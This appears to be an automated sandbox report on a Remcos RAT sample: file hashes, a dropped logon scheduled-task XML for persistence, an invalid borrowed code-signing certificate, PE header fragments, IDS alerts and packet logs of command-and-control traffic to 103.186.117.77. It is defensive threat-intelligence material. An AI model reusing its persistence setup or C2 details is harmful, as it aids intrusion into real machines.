                                                            Entropy (8bit):5.117969096645718
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtfxvn:cgergYrFdOFzOzN33ODOiDdKrsuTZv
                                                            MD5:D6882041330F6ECDD1F5931F2344851B
                                                            SHA1:9CAAA2CC2634F024F40AE7E9219C019E5090DE99
                                                            SHA-256:E6692D91DD0C10211596C56D85713669EF88B4A51DEE93799C250C5B525AC663
                                                            SHA-512:5E1FE55252CA0D16698776A7BF2A9F10FF29D925B318C41A9D9E925D7350FDF06141E0C9829F4AC31F6A1C253EDCA4C1926579BCEB8D29C22B9FDF63DC1661E3
                                                            Malicious:true
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                            Process:C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1587
                                                            Entropy (8bit):5.117969096645718
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtfxvn:cgergYrFdOFzOzN33ODOiDdKrsuTZv
                                                            MD5:D6882041330F6ECDD1F5931F2344851B
                                                            SHA1:9CAAA2CC2634F024F40AE7E9219C019E5090DE99
                                                            SHA-256:E6692D91DD0C10211596C56D85713669EF88B4A51DEE93799C250C5B525AC663
                                                            SHA-512:5E1FE55252CA0D16698776A7BF2A9F10FF29D925B318C41A9D9E925D7350FDF06141E0C9829F4AC31F6A1C253EDCA4C1926579BCEB8D29C22B9FDF63DC1661E3
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):2
                                                            Entropy (8bit):1.0
                                                            Encrypted:false
                                                            SSDEEP:3:Qn:Qn
                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                            Malicious:false
                                                            Preview:..
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1144840
                                                            Entropy (8bit):7.728131003608779
                                                            Encrypted:false
                                                            SSDEEP:24576:n2oNUrTTPrtbxvKQt0Zs1bKW2sFTkYFltyi8sxg5SSnvmMKBHJ/G8eZuhnYx:2oN+Tztbt6s1bV1FT5FjTbx4bnvFKjeX
                                                            MD5:03A6863E7931768C020F1A98531E5212
                                                            SHA1:7FBF21510BA0927B16F9DE491E6DACE95A35C228
                                                            SHA-256:96E41C2D613926361AFEBFC693537919269AE11F3FF721EB4F60BF823258E154
                                                            SHA-512:1C38FA9DC160A2B629A875EEDF406AF168F38380AC53824DD1203C74C1426417C104583858349FC5940F104A1233C33EE8B31A1E9C72F922912B72F55E842980
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0......L........... ... ....@.. ....................................@.....................................O.... ..dI...........B...6........................................................... ............... ..H............text........ ...................... ..`.rsrc...dI... ...J..................@..@.reloc...............@..............@..B........................H.......xk..t.............................................................(....*r.(......}......}......}....*..(......}......}......}.......}....*...0..O........(.....(.....{....o......../.........%.r...p.%.r...p.%.r!..p.o....&.sk...}....*j.(.....(......}.....(....*.*..{....s(...%o.....(....o.....(....*.0..P........{....{....r?..p(....,..{....rE..po....*.{....{....rO..p(....,..{....rU..po....*z.,..{....,..{....o......(....*..0.............a..`o ......(!....a("...*..(....,*...
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.728131003608779
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
File size: 1'144'840 bytes
MD5: 03a6863e7931768c020f1a98531e5212
SHA1: 7fbf21510ba0927b16f9de491e6dace95a35c228
SHA256: 96e41c2d613926361afebfc693537919269ae11f3ff721eb4f60bf823258e154
SHA512: 1c38fa9dc160a2b629a875eedf406af168f38380ac53824dd1203c74c1426417c104583858349fc5940f104a1233c33ee8b31a1e9c72f922912b72f55e842980
SSDEEP: 24576:n2oNUrTTPrtbxvKQt0Zs1bKW2sFTkYFltyi8sxg5SSnvmMKBHJ/G8eZuhnYx:2oN+Tztbt6s1bV1FT5FjTbx4bnvFKjeX
TLSH: EB35BDC03A253B27DEB895F0E155ED714BB529697018F6E61CDA3BD731E8B209A08F43
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0......L........... ... ....@.. ....................................@................................
Icon Hash: 0082c20149000000
Entrypoint: 0x5112e6
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x671FAAB3 [Mon Oct 28 15:16:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Signature Valid: false
Signature Issuer: CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After
• 12/11/2018 19:00:00 08/11/2021 18:59:59
Subject Chain
• CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version: 3
Thumbprint MD5: DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1: 5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256: 4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial: 7C1118CBBADC95DA3752C46E47A27438
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x111294         0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x112000         0x4964        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x114200         0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x118000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0x10f2ec      0x10f400  2114c7efc88f9d24d46e24521d32d6f4  False     0.8546721990207373   data       7.743373705728743    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x112000         0x4964        0x4a00    a866b64d693edb61fe8fb437d6fbd06e  False     0.27602407094594594  data       4.872146035796688    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x118000         0xc           0x200     7d0a0fd75e3e567393eb91f31f84990e  False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA       Size    Type                                                                                               Language  Country  ZLIB Complexity
RT_ICON        0x1120c8  0x4460  Device independent bitmap graphic, 71 x 118 x 32, image size 16756, resolution 3779 x 3779 px/m                       0.26433957952468007
RT_GROUP_ICON  0x116538  0x14    data                                                                                                                  1.1
RT_VERSION     0x11655c  0x404   data                                                                                                                  0.4280155642023346
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                           Severity  Source IP       Source Port  Dest IP         Dest Port  Protocol
2024-10-28T18:37:05.648954+0100  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin           1         192.168.2.5     49712        103.186.117.77  2404       TCP
2024-10-28T18:37:06.737690+0100  2032777  ET MALWARE Remcos 3.x Unencrypted Server Response   1         103.186.117.77  2404         192.168.2.5     49712      TCP
2024-10-28T18:37:15.238483+0100  2803304  ETPRO MALWARE Common Downloader Header Pattern HCa  3         192.168.2.5     49714        178.237.33.50   80         TCP
2024-10-28T18:39:33.065313+0100  2032777  ET MALWARE Remcos 3.x Unencrypted Server Response   1         103.186.117.77  2404         192.168.2.5     49712      TCP
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Oct 28, 2024 18:37:05.555284977 CET  49712        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:05.609548092 CET  2404         49712      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:05.613533974 CET  49712        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:05.648953915 CET  49712        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:05.711031914 CET  2404         49712      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:06.737689972 CET  2404         49712      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:06.739335060 CET  49712        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:06.773720980 CET  2404         49712      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:06.956659079 CET  2404         49712      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:06.961097002 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:06.998224974 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:06.998352051 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:06.998544931 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:07.050884962 CET  49714        80         192.168.2.5      178.237.33.50
Oct 28, 2024 18:37:07.105818033 CET  49712        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:07.252547979 CET  2404         49712      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:07.252626896 CET  49712        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:07.324609041 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:07.364667892 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:07.540654898 CET  2404         49712      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:07.540751934 CET  49712        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.105818033 CET  49714        80         192.168.2.5      178.237.33.50
Oct 28, 2024 18:37:08.461986065 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.462116957 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.462132931 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.462147951 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.462162018 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.462173939 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.462178946 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.462197065 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.462244987 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.462255001 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.462270021 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.462287903 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.462312937 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.462368965 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.495781898 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.495991945 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.496084929 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.591403008 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.637037039 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.653584003 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.653628111 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.653692007 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.654722929 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.654855967 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.654962063 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.657128096 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.657196045 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.657242060 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.659507990 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.659718990 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.659853935 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.661969900 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.661998034 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.662036896 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.664246082 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.715159893 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.766644001 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.766735077 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.766802073 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.788209915 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.788314104 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.788362980 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.789323092 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.789438009 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.789534092 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.791731119 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.791811943 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.791862011 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.794137955 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.794310093 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.794400930 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.796506882 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.796639919 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.796696901 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.875948906 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.876036882 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.876163960 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.902273893 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.902390003 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.902468920 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.926002979 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.926151037 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.926248074 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.927406073 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.927525043 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.927586079 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.929589033 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.929605961 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.929688931 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.932241917 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.932257891 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.932362080 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.934267044 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.934457064 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.934514999 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:08.936655998 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:08.980824947 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:09.012567043 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:09.012944937 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:09.013022900 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:09.037020922 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:09.037067890 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:09.037120104 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.112867117 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.112905025 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.112922907 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.112937927 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.112971067 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.112986088 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.112998009 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.112998009 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.113002062 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113024950 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113039970 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113051891 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.113054991 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113073111 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113094091 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113102913 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.113121033 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.113193989 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113209009 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113234997 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.113295078 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.113328934 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113348007 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113360882 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113389969 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.113408089 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113425016 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113459110 CET  49713        2404       192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.113523006 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113538980 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113563061 CET  2404         49713      103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.113578081 CET  2404         49713      103.186.117.77   192.168.2.5
                                                            Oct 28, 2024 18:37:10.113588095 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.113603115 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.113619089 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.113635063 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.113637924 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.113678932 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.113755941 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.113770962 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.113785982 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.113811016 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.114092112 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.114154100 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.114335060 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.115469933 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.115607023 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.126957893 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.127094030 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.127310991 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.128209114 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.128299952 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.128570080 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.130733967 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.130759954 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.130964041 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.179600000 CET240449713103.186.117.77192.168.2.5
